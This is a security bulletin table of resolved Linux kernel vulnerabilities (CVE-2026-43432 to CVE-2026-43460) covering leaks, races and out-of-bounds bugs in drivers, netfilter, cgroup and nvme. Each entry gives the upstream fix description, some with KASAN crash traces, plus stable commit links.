| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: usb: xhci: Fix memory leak in xhci_disable_slot() xhci_alloc_command() allocates a command structure and, when the second argument is true, also allocates a completion structure. Currently, the error handling path in xhci_disable_slot() only frees the command structure using kfree(), causing the completion structure to leak. Use xhci_free_command() instead of kfree(). xhci_free_command() correctly frees both the command structure and the associated completion structure. Since the command structure is allocated with zero-initialization, command->in_ctx is NULL and will not be erroneously freed by xhci_free_command(). This bug was found using an experimental static analysis tool we are developing. The tool is based on the LLVM framework and is specifically designed to detect memory management issues. It is currently under active development and not yet publicly available, but we plan to open-source it after our research is published. The bug was originally detected on v6.13-rc1 using our static analysis tool, and we have verified that the issue persists in the latest mainline kernel. We performed build testing on x86_64 with allyesconfig using GCC=11.4.0. Since triggering these error paths in xhci_disable_slot() requires specific hardware conditions or abnormal state, we were unable to construct a test case to reliably trigger these specific error paths at runtime. | 2026-05-08 | not yet calculated | CVE-2026-43432 | https://git.kernel.org/stable/c/1e800e26d54ccf2ddf2ea6d6cbe021c804d8aa62 https://git.kernel.org/stable/c/6288baf0c8c4dcfbf206773aede9c1f2269cec28 https://git.kernel.org/stable/c/46aea90763832cd6e9b0c2e1c00e6a9512156d4b https://git.kernel.org/stable/c/2e2baa8fb5aa4d080cbfeb84c51eff797529f413 https://git.kernel.org/stable/c/807e4fb5140c73eb5dba1e399a990db5c1f3cdf8 https://git.kernel.org/stable/c/c65f1b840ab8ce72ba68f1b63bab7960f8fdfa89 https://git.kernel.org/stable/c/078b446efc0f5e496c31bccb72b98af979963a83 https://git.kernel.org/stable/c/c1c8550e70401159184130a1afc6261db01fc0ce |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: rust_binder: fix oneway spam detection The spam detection logic in TreeRange was executed before the current request was inserted into the tree. So the new request was not being factored in the spam calculation. Fix this by moving the logic after the new range has been inserted. Also, the detection logic for ArrayRange was missing altogether which meant large spamming transactions could get away without being detected. Fix this by implementing an equivalent low_oneway_space() in ArrayRange. Note that I looked into centralizing this logic in RangeAllocator but iterating through 'state' and 'size' got a bit too complicated (for me) and I abandoned this effort. | 2026-05-08 | not yet calculated | CVE-2026-43435 | https://git.kernel.org/stable/c/edf685946c4acbe57cb96f8d5f3c07e9a2e973c8 https://git.kernel.org/stable/c/8d34c993a9a156e657e43cb95186980745cc3597 https://git.kernel.org/stable/c/4fc87c240b8f30e22b7ebaae29d57105589e1c0b |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ALSA: usb-audio: Check endpoint numbers at parsing Scarlett2 mixer interfaces The Scarlett2 mixer quirk in USB-audio driver may hit a NULL dereference when a malformed USB descriptor is passed, since it assumes the presence of an endpoint in the parsed interface in scarlett2_find_fc_interface(), as reported by fuzzer. For avoiding the NULL dereference, just add the sanity check of bNumEndpoints and skip the invalid interface. | 2026-05-08 | not yet calculated | CVE-2026-43436 | https://git.kernel.org/stable/c/b014cc945baba75816cda0cf8934be87c9ed4947 https://git.kernel.org/stable/c/c5c5a6c53cf3b658f1d4512dfa61f3cd25bc34ba https://git.kernel.org/stable/c/b267255c15d2a5b90c4e926146aa155e5161e264 https://git.kernel.org/stable/c/3d542cf3c4c854cdf5d58049771f68926b9eb2b9 https://git.kernel.org/stable/c/3d4f23885e4b90347c9a1d779af6e79a99b5172a https://git.kernel.org/stable/c/df1d8abf36ca3681c21a6809eaa9a1e01ef897a6 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: cgroup: fix race between task migration and iteration When a task is migrated out of a css_set, cgroup_migrate_add_task() first moves it from cset->tasks to cset->mg_tasks via: list_move_tail(&task->cg_list, &cset->mg_tasks); If a css_task_iter currently has it->task_pos pointing to this task, css_set_move_task() calls css_task_iter_skip() to keep the iterator valid. However, since the task has already been moved to ->mg_tasks, the iterator is advanced relative to the mg_tasks list instead of the original tasks list. As a result, remaining tasks on cset->tasks, as well as tasks queued on cset->mg_tasks, can be skipped by iteration. Fix this by calling css_set_skip_task_iters() before unlinking task->cg_list from cset->tasks. This advances all active iterators to the next task on cset->tasks, so iteration continues correctly even when a task is concurrently being migrated. This race is hard to hit in practice without instrumentation, but it can be reproduced by artificially slowing down cgroup_procs_show(). For example, on an Android device a temporary /sys/kernel/cgroup/cgroup_test knob can be added to inject a delay into cgroup_procs_show(), and then: 1) Spawn three long-running tasks (PIDs 101, 102, 103). 2) Create a test cgroup and move the tasks into it. 3) Enable a large delay via /sys/kernel/cgroup/cgroup_test. 4) In one shell, read cgroup.procs from the test cgroup. 5) Within the delay window, in another shell migrate PID 102 by writing it to a different cgroup.procs file. Under this setup, cgroup.procs can intermittently show only PID 101 while skipping PID 103. Once the migration completes, reading the file again shows all tasks as expected. Note that this change does not allow removing the existing css_set_skip_task_iters() call in css_set_move_task(). The new call in cgroup_migrate_add_task() only handles iterators that are racing with migration while the task is still on cset->tasks. Iterators may also start after the task has been moved to cset->mg_tasks. If we dropped css_set_skip_task_iters() from css_set_move_task(), such iterators could keep task_pos pointing to a migrating task, causing css_task_iter_advance() to malfunction on the destination css_set, up to and including crashes or infinite loops. The race window between migration and iteration is very small, and css_task_iter is not on a hot path. In the worst case, when an iterator is positioned on the first thread of the migrating process, cgroup_migrate_add_task() may have to skip multiple tasks via css_set_skip_task_iters(). However, this only happens when migration and iteration actually race, so the performance impact is negligible compared to the correctness fix provided here. | 2026-05-08 | not yet calculated | CVE-2026-43439 | https://git.kernel.org/stable/c/7c85debc35e6d131bd29c64f2ae78c6ede0e55c4 https://git.kernel.org/stable/c/3b95abab7369235a37b15eaec6e1a0b443bba7c7 https://git.kernel.org/stable/c/4a9654a2b46cfdaae287fb8995f536245635e467 https://git.kernel.org/stable/c/3dfd1328c05234e8d8fa61948b2ba82680594988 https://git.kernel.org/stable/c/9cca530c7cc1b3e02cb8fa7f80060dd4b38562ce https://git.kernel.org/stable/c/86ceaccfdfa16dad05addb33dc206e03589bcfd1 https://git.kernel.org/stable/c/9dc76f6fc0d28d2382583715bc4ec22f28104845 https://git.kernel.org/stable/c/5ee01f1a7343d6a3547b6802ca2d4cdce0edacb1 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net/mana: Null service_wq on setup error to prevent double destroy In mana_gd_setup() error path, set gc->service_wq to NULL after destroy_workqueue() to match the cleanup in mana_gd_cleanup(). This prevents a use-after-free if the workqueue pointer is checked after a failed setup. | 2026-05-08 | not yet calculated | CVE-2026-43440 | https://git.kernel.org/stable/c/59489ce60d7412ed82fb1d8002faa3102dcd4916 https://git.kernel.org/stable/c/6c92392602b451e3869f15ab685f8f650e942b13 https://git.kernel.org/stable/c/87c2302813abc55c46485711a678e3c312b00666 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ASoC: amd: acp-mach-common: Add missing error check for clock acquisition The acp_card_rt5682_init() and acp_card_rt5682s_init() functions did not check the return values of clk_get(). This could lead to a kernel crash when the invalid pointers are later dereferenced by clock core functions. Fix this by: 1. Changing clk_get() to the device-managed devm_clk_get(). 2. Adding IS_ERR() checks immediately after each clock acquisition. | 2026-05-08 | not yet calculated | CVE-2026-43443 | https://git.kernel.org/stable/c/0cee68fb7f4cf1562e067c5a82d25062a973b0d0 https://git.kernel.org/stable/c/30c64fb9839949f085c8eb55b979cbd8a4c51f00 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/amdkfd: Unreserve bo if queue update failed Error handling path should unreserve bo then return failed. (cherry picked from commit c24afed7de9ecce341825d8ab55a43a254348b33) | 2026-05-08 | not yet calculated | CVE-2026-43444 | https://git.kernel.org/stable/c/781110700ada22168fbb490dd61432d23a17a5b4 https://git.kernel.org/stable/c/529c985da1b277b36dc99aad660f96dc70f3c467 https://git.kernel.org/stable/c/b2b7742c465c8e3b36dc325a48abb4b9f2aaa38b https://git.kernel.org/stable/c/2ce75a0b7e1bfddbcb9bc8aeb2e5e7fa99971acf |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: e1000/e1000e: Fix leak in DMA error cleanup If an error is encountered while mapping TX buffers, the driver should unmap any buffers already mapped for that skb. Because count is incremented after a successful mapping, it will always match the correct number of unmappings needed when dma_error is reached. Decrementing count before the while loop in dma_error causes an off-by-one error. If any mapping was successful before an unsuccessful mapping, exactly one DMA mapping would leak. In these commits, a faulty while condition caused an infinite loop in dma_error: Commit 03b1320dfcee ("e1000e: remove use of skb_dma_map from e1000e driver") Commit 602c0554d7b0 ("e1000: remove use of skb_dma_map from e1000 driver") Commit c1fa347f20f1 ("e1000/e1000e/igb/igbvf/ixgb/ixgbe: Fix tests of unsigned in *_tx_map()") fixed the infinite loop, but introduced the off-by-one error. This issue may still exist in the igbvf driver, but I did not address it in this patch. | 2026-05-08 | not yet calculated | CVE-2026-43445 | https://git.kernel.org/stable/c/7eaeb778bfaa3b2a804f89321c234d59c74569db https://git.kernel.org/stable/c/0606c24a745bafd1be5d66c48361638cd9cad74b https://git.kernel.org/stable/c/519051c711dfd239ef6e4b28878efee400a035f9 https://git.kernel.org/stable/c/0a1fc25deabab4efce64610e3c449485c4fa8f5f https://git.kernel.org/stable/c/fa5ba9867a55e640df0dc79bf0199770fb043f03 https://git.kernel.org/stable/c/30e87ade8d678c25a8546cf38c0b498fa5cb27d3 https://git.kernel.org/stable/c/10b5e65959e955a1c8894e0a5413944b5a70204a https://git.kernel.org/stable/c/e94eaef11142b01f77bf8ba4d0b59720b7858109 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: accel/amdxdna: Fix runtime suspend deadlock when there is pending job The runtime suspend callback drains the running job workqueue before suspending the device. If a job is still executing and calls pm_runtime_resume_and_get(), it can deadlock with the runtime suspend path. Fix this by moving pm_runtime_resume_and_get() from the job execution routine to the job submission routine, ensuring the device is resumed before the job is queued and avoiding the deadlock during runtime suspend. | 2026-05-08 | not yet calculated | CVE-2026-43446 | https://git.kernel.org/stable/c/ac72e7385a2c7533dd766de4197134d96230be85 https://git.kernel.org/stable/c/6b13cb8f48a42ddf6dd98865b673a82e37ff238b |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: nvme-pci: Fix race bug in nvme_poll_irqdisable() In the following scenario, pdev can be disabled between (1) and (3) by (2). This sets pdev->msix_enabled = 0. Then, pci_irq_vector() will return MSI-X IRQ(>15) for (1) whereas return INTx IRQ(<=15) for (2). This causes IRQ warning because it tries to enable INTx IRQ that has never been disabled before. To fix this, save IRQ number into a local variable and ensure disable_irq() and enable_irq() operate on the same IRQ number. Even if pci_free_irq_vectors() frees the IRQ concurrently, disable_irq() and enable_irq() on a stale IRQ number is still valid and safe, and the depth accounting reamins balanced. task 1: nvme_poll_irqdisable() disable_irq(pci_irq_vector(pdev, nvmeq->cq_vector)) ...(1) enable_irq(pci_irq_vector(pdev, nvmeq->cq_vector)) ...(3) task 2: nvme_reset_work() nvme_dev_disable() pdev->msix_enable = 0; ...(2) crash log: ------------[ cut here ]------------ Unbalanced enable for IRQ 10 WARNING: kernel/irq/manage.c:753 at __enable_irq+0x102/0x190 kernel/irq/manage.c:753, CPU#1: kworker/1:0H/26 Modules linked in: CPU: 1 UID: 0 PID: 26 Comm: kworker/1:0H Not tainted 6.19.0-dirty #9 PREEMPT(voluntary) Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.3-0-ga6ed6b701f0a-prebuilt.qemu.org 04/01/2014 Workqueue: kblockd blk_mq_timeout_work RIP: 0010:__enable_irq+0x107/0x190 kernel/irq/manage.c:753 Code: ff df 48 89 fa 48 c1 ea 03 0f b6 14 02 48 89 f8 83 e0 07 83 c0 03 38 d0 7c 04 84 d2 75 79 48 8d 3d 2e 7a 3f 05 41 8b 74 24 2c <67> 48 0f b9 3a e8 ef b9 21 00 5b 41 5c 5d e9 46 54 66 03 e8 e1 b9 RSP: 0018:ffffc900001bf550 EFLAGS: 00010046 RAX: 0000000000000007 RBX: 0000000000000000 RCX: ffffffffb20c0e90 RDX: 0000000000000000 RSI: 000000000000000a RDI: ffffffffb74b88f0 RBP: ffffc900001bf560 R08: ffff88800197cf00 R09: 0000000000000001 R10: 0000000000000003 R11: 0000000000000003 R12: ffff8880012a6000 R13: 1ffff92000037eae R14: 000000000000000a R15: 0000000000000293 FS: 0000000000000000(0000) GS:ffff8880b49f7000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 0000555da4a25fa8 CR3: 00000000208e8000 CR4: 00000000000006f0 Call Trace: <TASK> enable_irq+0x121/0x1e0 kernel/irq/manage.c:797 nvme_poll_irqdisable+0x162/0x1c0 drivers/nvme/host/pci.c:1494 nvme_timeout+0x965/0x14b0 drivers/nvme/host/pci.c:1744 blk_mq_rq_timed_out block/blk-mq.c:1653 [inline] blk_mq_handle_expired+0x227/0x2d0 block/blk-mq.c:1721 bt_iter+0x2fc/0x3a0 block/blk-mq-tag.c:292 __sbitmap_for_each_set include/linux/sbitmap.h:269 [inline] sbitmap_for_each_set include/linux/sbitmap.h:290 [inline] bt_for_each block/blk-mq-tag.c:324 [inline] blk_mq_queue_tag_busy_iter+0x969/0x1e80 block/blk-mq-tag.c:536 blk_mq_timeout_work+0x627/0x870 block/blk-mq.c:1763 process_one_work+0x956/0x1aa0 kernel/workqueue.c:3257 process_scheduled_works kernel/workqueue.c:3340 [inline] worker_thread+0x65c/0xe60 kernel/workqueue.c:3421 kthread+0x41a/0x930 kernel/kthread.c:463 ret_from_fork+0x6f8/0x8c0 arch/x86/kernel/process.c:158 ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:246 </TASK> irq event stamp: 74478 hardirqs last enabled at (74477): [<ffffffffb5720a9c>] __raw_spin_unlock_irq include/linux/spinlock_api_smp.h:159 [inline] hardirqs last enabled at (74477): [<ffffffffb5720a9c>] _raw_spin_unlock_irq+0x2c/0x60 kernel/locking/spinlock.c:202 hardirqs last disabled at (74478): [<ffffffffb57207b5>] __raw_spin_lock_irqsave include/linux/spinlock_api_smp.h:108 [inline] hardirqs last disabled at (74478): [<ffffffffb57207b5>] _raw_spin_lock_irqsave+0x85/0xa0 kernel/locking/spinlock.c:162 softirqs last enabled at (74304): [<ffffffffb1e9466c>] __do_softirq kernel/softirq.c:656 [inline] softirqs last enabled at (74304): [<ffffffffb1e9466c>] invoke_softirq kernel/softirq.c:496 [inline] softirqs last enabled at (74304): [<ffffffffb1e9466c>] __irq_exit_rcu+0xdc/0x120 ---truncated--- | 2026-05-08 | not yet calculated | CVE-2026-43448 | https://git.kernel.org/stable/c/265dbc9bc33c29f60f90be3e0afe1c4067ebb70b https://git.kernel.org/stable/c/628773eba024d1107cc9ec157a682cbb42ac912a https://git.kernel.org/stable/c/843e913cef4e33723663a899727f685a95ab53fe https://git.kernel.org/stable/c/b56c49897bdac5cb49e3495ef421c391628ee9bb https://git.kernel.org/stable/c/e311d84c62eb76e025e11a44155b402e55950b83 https://git.kernel.org/stable/c/fc71f409b22ca831a9f87a2712eaa09ef2bb4a5e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: nvme-pci: Fix slab-out-of-bounds in nvme_dbbuf_set dev->online_queues is a count incremented in nvme_init_queue. Thus, valid indices are 0 through dev->online_queues − 1. This patch fixes the loop condition to ensure the index stays within the valid range. Index 0 is excluded because it is the admin queue. KASAN splat: ================================================================== BUG: KASAN: slab-out-of-bounds in nvme_dbbuf_free drivers/nvme/host/pci.c:377 [inline] BUG: KASAN: slab-out-of-bounds in nvme_dbbuf_set+0x39c/0x400 drivers/nvme/host/pci.c:404 Read of size 2 at addr ffff88800592a574 by task kworker/u8:5/74 CPU: 0 UID: 0 PID: 74 Comm: kworker/u8:5 Not tainted 6.19.0-dirty #10 PREEMPT(voluntary) Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.3-0-ga6ed6b701f0a-prebuilt.qemu.org 04/01/2014 Workqueue: nvme-reset-wq nvme_reset_work Call Trace: <TASK> __dump_stack lib/dump_stack.c:94 [inline] dump_stack_lvl+0xea/0x150 lib/dump_stack.c:120 print_address_description mm/kasan/report.c:378 [inline] print_report+0xce/0x5d0 mm/kasan/report.c:482 kasan_report+0xdc/0x110 mm/kasan/report.c:595 __asan_report_load2_noabort+0x18/0x20 mm/kasan/report_generic.c:379 nvme_dbbuf_free drivers/nvme/host/pci.c:377 [inline] nvme_dbbuf_set+0x39c/0x400 drivers/nvme/host/pci.c:404 nvme_reset_work+0x36b/0x8c0 drivers/nvme/host/pci.c:3252 process_one_work+0x956/0x1aa0 kernel/workqueue.c:3257 process_scheduled_works kernel/workqueue.c:3340 [inline] worker_thread+0x65c/0xe60 kernel/workqueue.c:3421 kthread+0x41a/0x930 kernel/kthread.c:463 ret_from_fork+0x6f8/0x8c0 arch/x86/kernel/process.c:158 ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:246 </TASK> Allocated by task 34 on cpu 1 at 4.241550s: kasan_save_stack+0x2c/0x60 mm/kasan/common.c:57 kasan_save_track+0x1c/0x70 mm/kasan/common.c:78 kasan_save_alloc_info+0x3c/0x50 mm/kasan/generic.c:570 poison_kmalloc_redzone mm/kasan/common.c:398 [inline] __kasan_kmalloc+0xb5/0xc0 mm/kasan/common.c:415 kasan_kmalloc include/linux/kasan.h:263 [inline] __do_kmalloc_node mm/slub.c:5657 [inline] __kmalloc_node_noprof+0x2bf/0x8d0 mm/slub.c:5663 kmalloc_array_node_noprof include/linux/slab.h:1075 [inline] nvme_pci_alloc_dev drivers/nvme/host/pci.c:3479 [inline] nvme_probe+0x2f1/0x1820 drivers/nvme/host/pci.c:3534 local_pci_probe+0xef/0x1c0 drivers/pci/pci-driver.c:324 pci_call_probe drivers/pci/pci-driver.c:392 [inline] __pci_device_probe drivers/pci/pci-driver.c:417 [inline] pci_device_probe+0x743/0x920 drivers/pci/pci-driver.c:451 call_driver_probe drivers/base/dd.c:583 [inline] really_probe+0x29b/0xb70 drivers/base/dd.c:661 __driver_probe_device+0x3b0/0x4a0 drivers/base/dd.c:803 driver_probe_device+0x56/0x1f0 drivers/base/dd.c:833 __driver_attach_async_helper+0x155/0x340 drivers/base/dd.c:1159 async_run_entry_fn+0xa6/0x4b0 kernel/async.c:129 process_one_work+0x956/0x1aa0 kernel/workqueue.c:3257 process_scheduled_works kernel/workqueue.c:3340 [inline] worker_thread+0x65c/0xe60 kernel/workqueue.c:3421 kthread+0x41a/0x930 kernel/kthread.c:463 ret_from_fork+0x6f8/0x8c0 arch/x86/kernel/process.c:158 ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:246 The buggy address belongs to the object at ffff88800592a000 which belongs to the cache kmalloc-2k of size 2048 The buggy address is located 244 bytes to the right of allocated 1152-byte region [ffff88800592a000, ffff88800592a480) The buggy address belongs to the physical page: page: refcount:0 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x5928 head: order:3 mapcount:0 entire_mapcount:0 nr_pages_mapped:0 pincount:0 anon flags: 0xfffffc0000040(head|node=0|zone=1|lastcpupid=0x1fffff) page_type: f5(slab) raw: 000fffffc0000040 ffff888001042000 0000000000000000 dead000000000001 raw: 0000000000000000 0000000000080008 00000000f5000000 0000000000000000 head: 000fffffc0000040 ffff888001042000 00000 ---truncated--- | 2026-05-08 | not yet calculated | CVE-2026-43449 | https://git.kernel.org/stable/c/2b9d605c3f0d3262142f196249cd3bd58c857c71 https://git.kernel.org/stable/c/86183d550559e45e07059bbdf17331fea469e38c https://git.kernel.org/stable/c/d7990c936e25f484b61a5adeeadc1d290a9fd16e https://git.kernel.org/stable/c/83e6edd6358326c9c2de31a54bb4a1ec50703f1f https://git.kernel.org/stable/c/50bad78f03a02d3c0f228edf9912b494d3e7acb9 https://git.kernel.org/stable/c/328c551f0cc81ee776b186b86cc6e5253bb6fda7 https://git.kernel.org/stable/c/78279d2d74c58a0ed64e43cf601a02649771182e https://git.kernel.org/stable/c/b4e78f1427c7d6859229ae9616df54e1fc05a516 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: netfilter: nfnetlink_cthelper: fix OOB read in nfnl_cthelper_dump_table() nfnl_cthelper_dump_table() has a 'goto restart' that jumps to a label inside the for loop body. When the "last" helper saved in cb->args[1] is deleted between dump rounds, every entry fails the (cur != last) check, so cb->args[1] is never cleared. The for loop finishes with cb->args[0] == nf_ct_helper_hsize, and the 'goto restart' jumps back into the loop body bypassing the bounds check, causing an 8-byte out-of-bounds read on nf_ct_helper_hash[nf_ct_helper_hsize]. The 'goto restart' block was meant to re-traverse the current bucket when "last" is no longer found, but it was placed after the for loop instead of inside it. Move the block into the for loop body so that the restart only occurs while cb->args[0] is still within bounds. BUG: KASAN: slab-out-of-bounds in nfnl_cthelper_dump_table+0x9f/0x1b0 Read of size 8 at addr ffff888104ca3000 by task poc_cthelper/131 Call Trace: nfnl_cthelper_dump_table+0x9f/0x1b0 netlink_dump+0x333/0x880 netlink_recvmsg+0x3e2/0x4b0 sock_recvmsg+0xde/0xf0 __sys_recvfrom+0x150/0x200 __x64_sys_recvfrom+0x76/0x90 do_syscall_64+0xc3/0x6e0 Allocated by task 1: __kvmalloc_node_noprof+0x21b/0x700 nf_ct_alloc_hashtable+0x65/0xd0 nf_conntrack_helper_init+0x21/0x60 nf_conntrack_init_start+0x18d/0x300 nf_conntrack_standalone_init+0x12/0xc0 | 2026-05-08 | not yet calculated | CVE-2026-43450 | https://git.kernel.org/stable/c/0605e1985a95d4334a67869aee45a47e82301abf https://git.kernel.org/stable/c/92441f6d9405a0c18d03f278b395e782f79a4a30 https://git.kernel.org/stable/c/3cc328ffc32ddb389cba7b78b6aa95d995c2876e https://git.kernel.org/stable/c/4a1f6ee69267a5f524102c028981410eeacfa3da https://git.kernel.org/stable/c/894c5780ddadd5fde0e16f66587918e6be1504c4 https://git.kernel.org/stable/c/05018cd9370f77bb18fbf6e15ff33c7a06f10b3c https://git.kernel.org/stable/c/61b3a1f8621df1a5928118313f133996f6a786db https://git.kernel.org/stable/c/6dcee8496d53165b2d8a5909b3050b62ae71fe89 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: netfilter: nfnetlink_queue: fix entry leak in bridge verdict error path nfqnl_recv_verdict() calls find_dequeue_entry() to remove the queue entry from the queue data structures, taking ownership of the entry. For PF_BRIDGE packets, it then calls nfqa_parse_bridge() to parse VLAN attributes. If nfqa_parse_bridge() returns an error (e.g. NFQA_VLAN present but NFQA_VLAN_TCI missing), the function returns immediately without freeing the dequeued entry or its sk_buff. This leaks the nf_queue_entry, its associated sk_buff, and all held references (net_device refcounts, struct net refcount). Repeated triggering exhausts kernel memory. Fix this by dropping the entry via nfqnl_reinject() with NF_DROP verdict on the error path, consistent with other error handling in this file. | 2026-05-08 | not yet calculated | CVE-2026-43451 | https://git.kernel.org/stable/c/a907bea273b60d3e604ec4e8e1f6c49954805794 https://git.kernel.org/stable/c/0b18d1b834ab5a5009be70b530f978d7989e445b https://git.kernel.org/stable/c/b38d2b4603fd3dda24eb8b3dd81c18a0930be97b https://git.kernel.org/stable/c/47b1c5d1b0944aa88299f55a846fabaefc756982 https://git.kernel.org/stable/c/cf4a4df38d1747e06fc54f9879bd7a6f4178032f https://git.kernel.org/stable/c/9853d94b82d303fc4ac37d592a23a154096ecd41 https://git.kernel.org/stable/c/208669df703a25a601f45822b10c413f258bf275 https://git.kernel.org/stable/c/f1ba83755d81c6fc66ac7acd723d238f974091e9 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: netfilter: nft_set_pipapo: fix stack out-of-bounds read in pipapo_drop() pipapo_drop() passes rulemap[i + 1].n to pipapo_unmap() as the to_offset argument on every iteration, including the last one where i == m->field_count - 1. This reads one element past the end of the stack-allocated rulemap array (declared as rulemap[NFT_PIPAPO_MAX_FIELDS] with NFT_PIPAPO_MAX_FIELDS == 16). Although pipapo_unmap() returns early when is_last is true without using the to_offset value, the argument is evaluated at the call site before the function body executes, making this a genuine out-of-bounds stack read confirmed by KASAN: BUG: KASAN: stack-out-of-bounds in pipapo_drop+0x50c/0x57c [nf_tables] Read of size 4 at addr ffff8000810e71a4 This frame has 1 object: [32, 160) 'rulemap' The buggy address is at offset 164 -- exactly 4 bytes past the end of the rulemap array. Pass 0 instead of rulemap[i + 1].n on the last iteration to avoid the out-of-bounds read. | 2026-05-08 | not yet calculated | CVE-2026-43453 | https://git.kernel.org/stable/c/1957e793196e7f8557374fd4eda53abcbb42e1c0 https://git.kernel.org/stable/c/57fb87ca095d5127cd7a27583b8ec43dcf7c9e9e https://git.kernel.org/stable/c/60c1d18781e37bfb96290b86510eb01c5fa24d75 https://git.kernel.org/stable/c/0a55d62cdb628923d8a21724374a70c76ac7d19d https://git.kernel.org/stable/c/dfbdac719198778b581bc0dd055df2542edb8c62 https://git.kernel.org/stable/c/e047f6fbb975f685d6c9fcef95b3b7787a79b46d https://git.kernel.org/stable/c/324b749aa5b2d516ccfab933df9d3f56e7807f5f https://git.kernel.org/stable/c/d6d8cd2db236a9dd13dbc2d05843b3445cc964b5 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mctp: route: hold key->lock in mctp_flow_prepare_output() mctp_flow_prepare_output() checks key->dev and may call mctp_dev_set_key(), but it does not hold key->lock while doing so. mctp_dev_set_key() and mctp_dev_release_key() are annotated with __must_hold(&key->lock), so key->dev access is intended to be serialized by key->lock. The mctp_sendmsg() transmit path reaches mctp_flow_prepare_output() via mctp_local_output() -> mctp_dst_output() without holding key->lock, so the check-and-set sequence is racy. Example interleaving: CPU0 CPU1 ---- ---- mctp_flow_prepare_output(key, devA) if (!key->dev) // sees NULL mctp_flow_prepare_output( key, devB) if (!key->dev) // still NULL mctp_dev_set_key(devB, key) mctp_dev_hold(devB) key->dev = devB mctp_dev_set_key(devA, key) mctp_dev_hold(devA) key->dev = devA // overwrites devB Now both devA and devB references were acquired, but only the final key->dev value is tracked for release. One reference can be lost, causing a resource leak as mctp_dev_release_key() would only decrease the reference on one dev. Fix by taking key->lock around the key->dev check and mctp_dev_set_key() call. | 2026-05-08 | not yet calculated | CVE-2026-43455 | https://git.kernel.org/stable/c/47893166bc5611ee9a20de6b8d2933b2320fb772 https://git.kernel.org/stable/c/86f5334fcb48a5b611c33364ab52ca684d0f6d91 https://git.kernel.org/stable/c/0695712f3a6f1a48915f95767cfb42077683dcdc https://git.kernel.org/stable/c/925a5ffd99cddd7a7e41d5ad120c7a2c6d50260f https://git.kernel.org/stable/c/8d27d9b260dd19c1b519e1a13de6448f9984e30e https://git.kernel.org/stable/c/7d86aa41c073c4e7eb75fd2e674f1fd8f289728a |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mctp: i2c: fix skb memory leak in receive path When 'midev->allow_rx' is false, the newly allocated skb isn't consumed by netif_rx(), it needs to free the skb directly. | 2026-05-08 | not yet calculated | CVE-2026-43457 | https://git.kernel.org/stable/c/0fb2adbdd5c03e8c9ebcdc48afd414b2724c85eb https://git.kernel.org/stable/c/d7900a43b0a314a645ca0a2adf45928dbc7001f4 https://git.kernel.org/stable/c/9f81be2ab9d8e4744871bfb3e868ef413413829f https://git.kernel.org/stable/c/1ec54187e1aa40a4cfa2b265e9a311179f24b98d https://git.kernel.org/stable/c/1b1be322342a6b0085bf6ee52235e5ac9834ec25 https://git.kernel.org/stable/c/e3f5e0f22cfc2371e7471c9fd5b4da78f9df7c69 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: serial: caif: hold tty->link reference in ldisc_open and ser_release A reproducer triggers a KASAN slab-use-after-free in pty_write_room() when caif_serial's TX path calls tty_write_room(). The faulting access is on tty->link->port. Hold an extra kref on tty->link for the lifetime of the caif_serial line discipline: get it in ldisc_open() and drop it in ser_release(), and also drop it on the ldisc_open() error path. With this change applied, the reproducer no longer triggers the UAF in my testing. | 2026-05-08 | not yet calculated | CVE-2026-43458 | https://git.kernel.org/stable/c/23a3ac2e2262a291498567418227b99e1f3606b1 https://git.kernel.org/stable/c/52135420e9f75853ea0c6cea7b736e3e98495f7d https://git.kernel.org/stable/c/ca2ceba983bb23ea0202c2882d963253416654a3 https://git.kernel.org/stable/c/8460187b4852fd00bd1c76394358053f3fa4d089 https://git.kernel.org/stable/c/27e43356d0defb9fc7fa25265219a3ffeb7b3e98 https://git.kernel.org/stable/c/35b58d3bc716ebb9ebd10fe1cac8c1177242511c https://git.kernel.org/stable/c/97a0bb491cae39478c6225381f14e9ac67b7bba7 https://git.kernel.org/stable/c/288598d80a068a0e9281de35bcb4ce495f189e2a |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: spi: rockchip-sfc: Fix double-free in remove() callback The driver uses devm_spi_register_controller() for registration, which automatically unregisters the controller via devm cleanup when the device is removed. The manual call to spi_unregister_controller() in the remove() callback can lead to a double-free. And to make sure controller is unregistered before DMA buffer is unmapped, switch to use spi_register_controller() in probe(). | 2026-05-08 | not yet calculated | CVE-2026-43460 | https://git.kernel.org/stable/c/b6051f2bdd4bd3dde85b68558edd3a6843489221 https://git.kernel.org/stable/c/85fb53351e6a3b921357a2178671e847a087e400 https://git.kernel.org/stable/c/111e2863372c322e836e0c896f6dd9cf4ee08c71 |
